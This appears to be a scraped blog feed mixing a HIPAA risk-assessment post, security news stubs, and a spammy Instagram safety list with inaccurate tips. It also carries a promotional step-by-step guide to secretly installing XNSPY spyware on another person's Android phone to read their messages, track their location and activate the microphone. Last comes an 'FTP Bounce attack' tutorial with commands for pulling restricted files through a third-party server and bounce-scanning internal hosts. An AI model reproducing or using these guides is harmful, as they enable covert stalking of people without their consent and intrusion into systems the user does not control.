Security Risk Assessments and OneNote

0

Reading time: <4 minutes | Audience: HIPAA-covered entities | Pre-Requisites: Oxygen-breather, involved in healthcare MIPS compliance and attestation, and certain security responsibilities.

I had the pleasure of providing two separate briefs on compliance, specifically as it pertained to security risk assessments (SRAs). Most of you if not all are aware that a yearly SRA is a required element to MIPS attestation. If I had a chance to make one recommendation that sticks, it would be this: keep it simple, keep it central, and keep it versatile.

Okay, I know technically that was three recommendations. Forgive me.

Make It SOP

Your best bet is always to weave the milestones of compliance into your standard operating procedures.

That is our goal.

Continuous Improvement

Also, since we know that there is always room for improvement, why not aspire to a “continuous improvement” environment? Well, with those two statements as the cornerstone of how we do business here, the interviewer recommended that I hold clinics on the topic. As nice as the compliment was, I took it more as a calling: help others with this daunting task, and maybe even provide some tools that can help.

When you are looking down the barrel of a HIPAA audit, being prepared is always the best policy. For me, getting prepared demands that I get organized!

Speaking of getting organized…

What Are My Options?

You have some options here. For SMBs (Small and Medium-Sized Businesses), there are companies that have service offerings that cost [Austin Power’s Voice] 1 Million Dollars, and honestly – you may spend the same amount of work-hours over-editing its results. It may be more cost-effective to just keep it simple, learn the details behind the corresponding governance, and become a subject matter expert in your own right.

For those organizations that are much larger and need a leg-up, including the scaling tools and automation that comes with it… the 1-Million-Dollar offerings from certain service providers might be the way to go for you.

The contents of this article and the tool that comes with it… free.

What is OneNote?

I have been using OneNote for a few years now, and I am convinced that my life – both professionally and personally – would be very challenging without it!

OneNote is basically your own digital notebook. It runs on smartphones as well as PCs (maybe even Macs, I can’t attest to that). You can easily organize your ideas, to-dos, images, documents, text snippets… you name it!

You can type notes, record audio, sketch or write ideas, and add pictures. It comes complete with several ways to organize and search your data. You can also share your OneNote notebooks with others!

Conducting that SRA is a major step in preparing for and successfully making it through a HIPAA audit. It is with this in mind that I took the time to smash the requirements/questions from the HIPAA Administrative, Physical, and Technical Safeguards questionnaire into an outline form in OneNote.

Free Tool

Having your SRA outline and matching way to collect and organize all related artifacts in OneNote makes it portable, sharable, and flexible. Once you have completed your organization’s SRA, it is simple enough to export into PDF form.

Simply contact me if you would like a copy of this OneNote SRA outline. It is free, and you can bend it, break it, shape it, or alter it however you would like.

I also welcome any input you have on it. This tool is distributed as-is.

Help

I have twisted OneNote into just about every form you can imagine, so if you need some pointers on OneNote or the SRA – please reach out.

References

For advanced reading on some of these topics, here are some resources for you to check out:

QPP & MIPS Background Information: https://qpp.cms.gov/

HIPAA Privacy Rule (Administrative, Physical, and Technical Safeguards): https://www.hhs.gov/hipaa/for-professionals/privacy/index.html

NIST Cybersecurity Framework: https://www.nist.gov/cyberframework

What is OneNote? https://support.microsoft.com/en-us/office/video-what-is-onenote-be6cc6cc-3ca7-4f46-8876-5000f013c563

P.S. OneNote is also HIPAA compliance-ready… all you need is the BAA, which Microsoft will give you. Please note (no pun) that I do not recommend OneNote be used to store ePHI (I do not)… but it’s the thought that counts. Thanks, Microsoft.

#cybersecurity #mips #onenote #security #risk #attestation #securityriskassessment #assessment

How Any Android Can Be Hacked via an APK Download

0

If you are planning to hack an Android device, it means that you want to take control of that device. Hacking an Android phone is merely not an impossible task. You can keep track of all the information saved in that device, view the saved contacts, and get your hands on the required data. All of this may seem like a tough job for an average person, but now it’s as easy as it is for professionals. Anyone with basic knowledge and enough will can hack a phone and check the required data. A decade ago, only professionals practiced hacking. But it’s not the same anymore. You can hack an Android phone in various ways. With such an evolved technology, surveillance of anyone or any device has become a lot easier. You can sit in your bedroom and know the events occurring in another person’s life. However, the process of hacking any device generally involves the risk of malware. Hacking a mobile is more likely to find new endpoints of viruses and bugs. These viruses can affect the device in many ways. If a phone gets infected with malware, it starts to behave differently. The data and information saved in the device might get affected by the malware to the extent of losing it entirely.

However, there is a simpler alternative that can help you get into the required Android device. It is by downloading the APK file of spying software on the Android smartphone. If you try to hack someone’s phone, the slow speed and glitches may appraise the user that their device has been hacked. However, spying apps work in stealth mode. The user cannot know that the phone is being tracked. With the monitoring software, anyone can get into someone’s phone remotely. If you have sparse knowledge of how an Android device generally works, you can gather the information on anyone you are interested in without any difficulty. 

It can be a daunting task to choose a monitoring app that can satisfy all of your requirements. You will have to watch out for all the loud and flashy advertisements that promise to break into a phone but fail to do so.  

This article will show you how you can hack any Android phone using the most reliable APK file. XNSPY is one of the most used and reputed monitoring apps that allows you to monitor any device without affecting the phone or its data. XNSPY offers the most user-friendly interface that allows anyone to any Android device. It gives you the remote control of the device by collecting information from the emails, call logs, text messages, or conversations taking place on WhatsApp, Skype, Facebook Messenger, and other social engines. It also allows you to track the GPS location and social media activities of any Android user. The features, affordability, and 24/7 customer support, adds up to make XNSPY the best solution for you. Hacking a device using the XNSPY APK file might seem a bit confusing if you are using it for the first time. However, to clear the confusion, here is the step-to-step guide for downloading and installing the XNSPY APK file on an Android device.

Installation Requirements

The installation process requires one-time physical access to the device that you want to get in. However, once you have installed the software, you can monitor and control the device remotely.

How to Install XNSPY APK

STEP 1: You will visit the official website of XNSPY and choose a suitable subscription for yourself.

STEP 2: You will enter the required information, i.e., email address and credit card details.

STEP 3: Once you have entered the details, you will secure your payments.

STEP 4: Check your email address for an email that consists of your XNSPY account and password details. You can find an installation guide in this email too.

STEP 5: You will also get a URL in this email. It will help you install the software.

STEP 6: You can use the provided URL to install the software. The remaining installation period can be seen from the notification bar.

STEP 7: Once the downloading is completed, you can see a file named “Appv2.apk.”

STEP 8: Tap on the file and open it.

STEP 9: A dialogue box will appear. Choose the setting and turn on the “Allow from this source.” It will take you to the next option.

STEP 10: You will select “Install” to proceed with the installation process on the device.

STEP 11: Open the file after the installation is completed.

STEP 12: You will choose “allow” for the next battery optimization dialogue box.

STEP 13: After that, you will have to allow Android Auto Permission for the next few dialogue boxes according to your needs. For example, you will enable the device location to know the locality in the future.

STEP 14: Once you get done with the permissions, you will have to enter an activation code. You can get this code from the same email that you received at the start.

STEP 15: Read all the terms and conditions and privacy policy and choose “Accept.”

STEP 16: Choose the start and continue the installation process.

STEP 17: Select “Proceed” and Enable Android Auto from the Proceeding Accessibility screen.

STEP 18: Choose “Proceed” and select the Android Auto and turn on the “Allow usage tracking.”

STEP 19: You will then continue and enable Android Auto from the Notification Access and choose “Allow.”

STEP 20: Proceed and choose “Activate this device administrator” at the bottom.

STEP 21: Select “Don’t show again” from the dialogue box that will appear here, and select “Start Now.”

STEP 22: Now select “Proceed” and allow all the Auto permissions (If you have already allowed all the permissions, you will not see the dialogue boxes again.)

How does XNPSY work?

You can get a vast amount of information on any Android device using XNSPY. Some of the features that can help you collect the data are below:

Call logs

You can have access to all of the phone logs of the device. You can see the incoming, out-going, and missed calls along with the time, date, and duration of each call. You can also access all the contacts saved on the device as well. 

Texts and instant messages

It allows you to check every text message on the device. It also supports different messengers that help you keep track of those conversations too. The web control panel gives you a list of the apps that you can monitor. Some of these apps are Facebook Messenger, Instagram, WhatsApp. Viber, Twitter, and many more. 

Multimedia tracking

You can keep track of all the multimedia files saved on the Android device. You can view and download any files exchanged on the messaging apps also.

Installed Apps

You can manage the installed apps, too. XNSPY allows you to delete or block any application on the Android device remotely.

GPS tracking

It helps you by tracking the location of any device. You can know the locality anytime. XNSPY allows you to see the location history of the device as well.

Remote control

It allows you to control the device remotely. You can take pictures, turn on the microphone to record the surroundings, delete data, and even lock the phone, when you want, through XNSPY.

How To Prevent Your Instagram Account from Getting Hacked

0

Almost every one of us uses the social media app Instagram. Every day, people spend quite a long time on this site. Even celebrities, sportspersons, industrialists, and lots of other people prefer to use this app more than any other social site. There are lots of new features to explore this app and even the users enjoy a lot to use this Instagram app as well.

However, there are billions of users of this app and every day lots of people are logging on to this app to use it. Though there are numerous users who use the app just to bring some followers and likes on their posted pictures or videos. Hence, they can go with the app Followers Gallery; it will help them to have both of things easily.

Moreover, there are many more other features available too for all the users which they can avail themselves. With the help of this app, everybody can obtain free Instagram followers as well.

Nevertheless, they keep the features like how to get 1k followers on Instagram in 5 minutes and other relatable features as well. However, here in this article, we will see how one can keep his or her Instagram account safe from getting hacked by hackers.

6 Steps To Maintain To Keep The Instagram Account Secure

Here we will suggest to you a few of the helpful or best steps which you can do to prevent your Instagram account from being hacked. If anyone wants Instagram auto liker without login then they can also do it as well. Now let us see the steps in the section below.

1. Avoid Connecting To Instagram Via Facebook

To avoid hacking, at first, you will have to keep some points in your head. In addition, you will have to properly maintain those steps as well. Besides that, if you connect your Instagram account to your Facebook profile then do not even try to login into the Instagram profile via Facebook account. It might be helpful for hackers to hack your account easily. If you open your Instagram account via Facebook then the hackers can detach the passwords. Moreover, your account will be hacked within the next few moments. Thus, always try to avoid such mistakes.

2. Use Strong Password

To prevent your Instagram account hacked you can use a strong password for the account as well. If you use any common or easy passwords for your Instagram profile then it will be very easy to hack the account with ease. Hence, do use a strong password with the combination of letters, numbers, and punctuation as well.

3. Don’t Talk To Strangers

There are lots of people on Instagram or any other platforms which you do not know personally. Hence, do not even talk to those types of people on any platforms freely. It might be a plan of the hackers to collect information from you. Thus avoid this step to keep your account safe.

4. Enable Two-Factor Authentication

You can use the two-factor authentication feature of the Instagram app. If you use this feature then it will require a password whenever you will log in to the app.

5. Use A VPN

Moreover, one can use VPN security as well to prevent your Instagram account from being hacked.

6. Avoid Viewing Instagram Posts On Other Platforms

Besides that, never ever use any other platforms to view your Instagram profile or posts. If you do it then it might be helpful for hackers to hack the Instagram profile simply.

Conclusion

Hence, all of these steps are very useful and anyone can apply these steps as well to prevent his or her Instagram account from being hacked.

 

 

Hackers Challenge

0

You can win an award of $100,000!

Go here: http://yaf.cyber20.com/

Microsoft Says Its Systems Were Also Breached in Massive SolarWinds Hack

0

The massive state-sponsored espionage campaign that compromised software maker SolarWinds also targeted Microsoft, as the unfolding investigation into the hacking spree reveals the incident may have been far more wider in scope, sophistication, and impact than previously thought.
News of…

Original Link

This is an excerpt of the content from the original author who maintains all rights.

NSA Warns Of Russian Government-Backed Hackers Aiming At US Defense Sector Targets

0

The National Security Agency issued an alert Monday warning… [Full Article Here]

JP Morgan – $1B Fine – You Gotta Read This

0

I mean seriously… the rest of us have to play fair. They were allegedly running a racketeering operation?

Original post: https://shedly.com/5A4je

Social Media Site for Hackers?

0

How to Hack Internal Private Systems Using FTP Bounce Attack?

0

Hello hackers, so today we are going to learn how can we attack the internal ftp private servers for a public server which we have exploited earlier to get the login user credentials for FTP port using Brute force with Hydra. This method is known as FTP Bounce attack as we deploy packets which bounce through an intermediate public server to the private victim machine.

The motive

You are a user in at a foreign region with IP address F.F.F.F and want to retrieve cryptographic source code from crypto.com in US. The FTP server at crypto.com is set up so as to allow you the connection, but deny the access to the crypto sources because your source IP address is a non-US site [as the FTP server can determine your DNS server]. In any case, you cannot directly retrieve the source code from crypto.com’s server.

However, crypto.com allow ufred.edu to download crypto sources because ufred.edu is of US. It happens you know that incoming data for ufred.edu is a worldwide write-able directory, through which any anonymous user can drop files and read them back. Let us assume that the IP address for Crypto.com’s is C.C.C.C.

FTP Bounce secure connection

The attack

Now assuming you have an FTP server that does passive mode. Open an FTP connection to your own machine’s real IP address [not localhost] and log in. Change to a convenient directory that you have the write access to, and then do:

	quote "pasv"
	quote "stor foobar"

Take note of the address and port that are returned from the PASV command, F,F,F,F,X,X. This FTP session will now hang, so background it or flip to another window or something to proceed with the rest of this.

Construct a file containing FTP server commands. Let’s call this file”instrs". It will look like this:

	user ftp
	pass -anonymous@
	cwd /export-restricted-crypto
	type i
	port F,F,F,F,X,X
	retr crypto.tar.Z
	quit
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	...

F,F,F,F,X,X is the same address and port that your own machine handed you on the first connection. The trash at the end is extra lines you create, each containing 250 NULLS and nothing else, enough to fill up about 60K of extra data.

Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming. Now type the following into this FTP session, which transfers a copy of your”instrs” file over and then tells ufred.edu’s FTP server to connect to crypto.com’s FTP server using your file as the commands:

	put instrs
	quote "port C,C,C,C,0,21"
	quote "retr instrs"

Crypto.tar.Z should now show up as”foobar” on your machine via your first FTP connection. If the connection to ufred.edu didn’t die by itself due to an apparently common server bug, clean up by deleting “instrs” and exciting. Otherwise, you’ll have to reconnect to finish.

FTP Bounce Port Scanning
You can use the nmap port scanner in Unix and Windows environments to perform an FTP bounce port scan, using the -P0 and -b flags in the following manner:

nmap -P0 -b username:password@ftp-server:port <target host>

shows an FTP bounce port scan being launched through the Internet-based 142.51.17.230 to scan an internal host at 192.168.0.5, a known address previously enumerated through DNS querying.

FTP bounce scanning with nmap

# nmap -P0 -b 142.51.17.230 192.168.0.5 -p21,22,23,25,80Starting nmap 3.45 ( www.insecure.org/nmap/ )

Interesting ports on (192.168.0.5):

Port State Service

21/tcp open ftp

22/tcp open ssh

23/tcp closed telnet

25/tcp closed smtp

80/tcp open http

Nmap run completed — 1 IP address (1 host up) scanned in 12 seconds

Note :
When performing any type of bounce port scan with nmap, you should specify the -P0 option. This will prevent an attacker from probing the target host to ascertain whether it is up.

FTP Bounce Exploit Payload Delivery

If you can upload a binary file containing a crafted buffer overflow string to an FTP server that in turn is vulnerable to bounce attack, you can then send that information to a specific service port (either on the local host or other addresses). This concept is shown in Figure 8-2.

 An illustration of the FTP payload bounce attack

 

FTP Bounce firewall block

For this type of attack to be effective, an attacker needs to authenticate and log into the FTP server, locate a writeable directory, and test to see if the server is susceptible to FTP bounce attack. Solaris 2.6 is an excellent example because in its default state it is vulnerable to FTP bounce and RPC service overflow attacks. Binary exploit data isn’t the only type of payload that can be bounced through a vulnerable FTP server: spammers have also sent an unsolicited email this way.

Other possibilities

Despite the fact that such third-party connections are one-way only, they can be used for all kinds of things. Similar methods can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time. A little thought will bring the realisation of numerous other scary possibilities.

FTP Bounce Description

Connections launched this way come from source port 20, which some sites allow through their firewalls in an effort to deal with the “ftp-data” problem. For some purposes, this can be the next best thing to source-routed attacks and is likely to succeed where source routeing fails against packet filters. And it’s all made possible by the way the FTP protocol spec was written, allowing control connections to come from anywhere and data connections to go anywhere.

If you like this article kindly rate it and do share. if you have any queries please comment below and let us know how you felt about the article. To know how to find devices on the internet to hack into them read the article on How To Use Shodan For Finding Vulnerable Targets, Information Gathering & Hacking?

Thank you.